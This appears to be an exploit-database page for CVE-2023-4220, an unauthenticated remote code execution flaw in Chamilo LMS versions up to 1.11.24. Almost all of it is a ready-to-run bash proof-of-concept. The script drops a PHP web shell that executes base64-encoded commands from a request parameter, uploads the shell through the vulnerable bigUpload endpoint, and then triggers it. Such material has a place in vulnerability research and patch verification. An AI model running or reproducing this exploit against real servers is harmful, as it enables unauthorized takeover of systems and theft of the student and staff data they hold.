Share
## https://sploitus.com/exploit?id=DFE9BBDB-BA64-57BE-ABCA-8364EBDD9116
#################################
CVE-2023-4220 RCE Chamilo 1.11.24
#################################
| https://starlabs.sg/advisories/23/23-4220/
|
| Chamilo LMS <= 1.11.24 (Beersel 31/08/2023)
| Unauthenticated File Remote Code Execution on "Big Upload" lib
|
| Identify version : /documentation/changelog.html
|
| POC EXPLOIT CVE RCE VULN
|
.. code-block:: bash
#!/bin/bash
HOST='http://lms.domain.com'
CMD='id'
URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'
cat <<'EOF'>/tmp/rce.php
<?php
$a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
?>
EOF
curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
curl "$HOST/$URL_FILE?aoOoy=$CMD"
|